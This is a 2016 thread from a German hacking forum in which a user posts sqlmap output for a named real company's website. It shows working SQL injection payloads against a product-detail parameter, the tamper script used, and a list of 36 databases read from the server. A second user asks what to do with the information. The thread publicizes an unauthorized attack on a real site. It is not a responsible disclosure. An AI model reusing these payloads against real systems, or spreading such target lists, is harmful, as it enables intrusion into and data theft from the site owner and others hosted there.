Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

[SQLi] www.karl-dose.de 36 DBs

- - - - -
Erstellt von len0 ,

  • Bitte melde dich an um zu Antworten
Eine Antwort in diesem Thema

#1
len0
Geschrieben 02 August 2016 - 21:01 Uhr

len0

    Leecher

  • Banned
  • PIP
    • Likes
    0
  • 0 Beiträge
  • 24 Bedankt 
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: http://www.karl-dose.de:80/en/produkt_detail.asp?ID=-9610) OR 1094=1094-- Iauk

    Type: error-based
    Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
    Payload: http://www.karl-dose.de:80/en/produkt_detail.asp?ID=-1360) OR 3938=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+
CHAR(112)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (3938=3938) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(1
13)+CHAR(98)+CHAR(113)))-- vDXC

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: http://www.karl-dose.de:80/en/produkt_detail.asp?ID=(SELECT CHAR(113)+CHAR(120)+CHAR(112)+CHAR(98)+CHAR(113
)+(SELECT (CASE WHEN (5358=5358) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(98)+CHAR(113))
Tamper [SQLMap] space2mysqlblank.py
available databases [36
[*] adrextern
[*] alarmtest
[*] aoledvtest
[*] aspdb
[*] ateco
[*] attribut
[*] berater-im-web.de
[*] c-c_de
[*] da_bestell_ich
[*] dbegl2
[*] eee
[*] falz
[*] gwpstest
[*] hd-maschinen
[*] hpm
[*] hpmdb
[*] hsi
[*] jupitec.de
[*] karl dose
[*] Kennwort
[*] klc
[*] master
[*] merak02
[*] model
[*] msdb01
[*] mvadb
[*] rak_testsite2
[*] Servercontroller
[*] sfw_forum
[*] sfw_master
[*] spainweb
[*] tempdb
[*] tietokanta
[*] Urlaubsregion
[*] warpedthought
[*] wkpdb

#2
leonalexkraus
Geschrieben 03 August 2016 - 11:16 Uhr

leonalexkraus

    Noob

  • Members
  • PIPPIP
    • Likes
    0
  • 8 Beiträge
  • 0 Bedankt
  • 723012

Was fange ich mit diesen Informationen an? Und was genau ist dort passiert? Wäre nett, wenn mir das jemand kurz erklären könnte.. :)


Zurück zu  Classic Hacking

  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


This topic has been visited by 79 user(s)


    <cerrno>, 2242, 3eyes, Arakiba, bangsder, BayernFox, Black Cango, c0274n4, chick0n, clusterhead, Crumble, cyberbitch, dasgasglord, dev-0, DNBLOVER, DrPepper, EncepT, EShad0w, Exobyte, Feierabendhd546, Framerater, Franziskaner, gr33d, gtawelt, gutzuu, h04x, h4ket, hackEmcee, Haxlor, heckerhere, holz96, igorborisvas, Injection, isi, ItsDezzen, Kaase, kalixa, KimJongun, Klopfer, Kozuki, kpakpando, L00t3r, len0, leonalexkraus, Lyrix, Makiavelic, marcf2009, MarkSantos, mashok, mettbrot, mindblow, nibble nibble, NichtDiePolizei, OMEGA, Phalanx, pi^2, pwcca, SavE1, saynthng, SecurityFlaw, sh!fted, Silent0wn3r, smc2014, Smokyjoe, Stalin, stoneserv, Swiper, the.3nd, tianchrispro, toprated, tybor, umarex, weedneger77, westendboy, XCherry, xFAUSTx, xtrx, Zero-X, ZeroFreez
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.
  1. Toolbase.bz
  2.   Hacking & Security
  3.  Classic Hacking